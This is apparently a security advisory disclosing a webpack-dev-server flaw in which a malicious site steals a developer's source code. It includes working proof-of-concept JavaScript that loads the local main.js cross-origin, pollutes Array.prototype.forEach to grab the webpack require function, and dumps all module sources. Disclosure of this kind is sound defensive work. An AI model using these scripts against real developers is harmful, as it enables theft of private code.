Source code may be stolen when you access a malicious web site.
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js">
in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString
against the values in __webpack_modules__
, the attacker can get the source code.
npm i
npx webpack-dev-server
https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
The script in the POC site is:
let moduleList
const onHandlerSet = (handler) => {
console.log('h', handler)
moduleList = handler.require.m
}
const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
callback((handler) => {
onHandlerSet(handler)
})
originalArrayForEach.call(this, callback, thisArg)
Array.prototype.forEach = originalArrayForEach
}
const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
})
document.head.appendChild(script)
This script uses the function generated by renderRequire
.
// The require function
function __webpack_require__(moduleId) {
// Check if module is in cache
var cachedModule = __webpack_module_cache__[moduleId];
if (cachedModule !== undefined) {
return cachedModule.exports;
}
// Create a new module (and put it into the cache)
var module = __webpack_module_cache__[moduleId] = {
// no module.id needed
// no module.loaded needed
exports: {}
};
// Execute the module function
var execOptions = {
id: moduleId,
module: module,
factory: __webpack_modules__[moduleId],
require: __webpack_require__
};
__webpack_require__.i.forEach(function(handler) {
handler(execOptions);
});
module = execOptions.module;
execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
// Return the exports of the module
return module.exports;
}
Especially, it uses the fact that Array::forEach
is called for __webpack_require__.i
and execOptions
contains __webpack_require__
.
It uses prototype pollution against Array::forEach
to extract __webpack_require__
reference.
This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.
<details> <summary>Old content</summary>
Source code may be stolen when you use output.iife: false
and access a malicious web site.
When output.iife: false
is set, some global variables for the webpack runtime are declared on the window
object (e.g. __webpack_modules__
).
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js">
in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window
object.
By using Function::toString
against the values in __webpack_modules__
, the attacker can get the source code.
I pointed out output.iife: false
, but if there are other options that makes the webpack runtime variables to be declared on the window
object, the same will apply for those cases.
npm i
npx webpack-dev-server
https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
src/index.js
and other scripts loaded.The script in the POC site is:
const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
for (const module in window.__webpack_modules__) {
console.log(`${module}:`, window.__webpack_modules__[module].toString())
}
})
document.head.appendChild(script)
This vulnerability can result in the source code to be stolen for users that has output.iife: false
option set and uses a predictable port and output path for the entrypoint script.
</details>
{ "github_reviewed_at": "2025-06-04T21:09:13Z", "nvd_published_at": "2025-06-03T18:15:25Z", "github_reviewed": true, "cwe_ids": [ "CWE-749" ], "severity": "MODERATE" }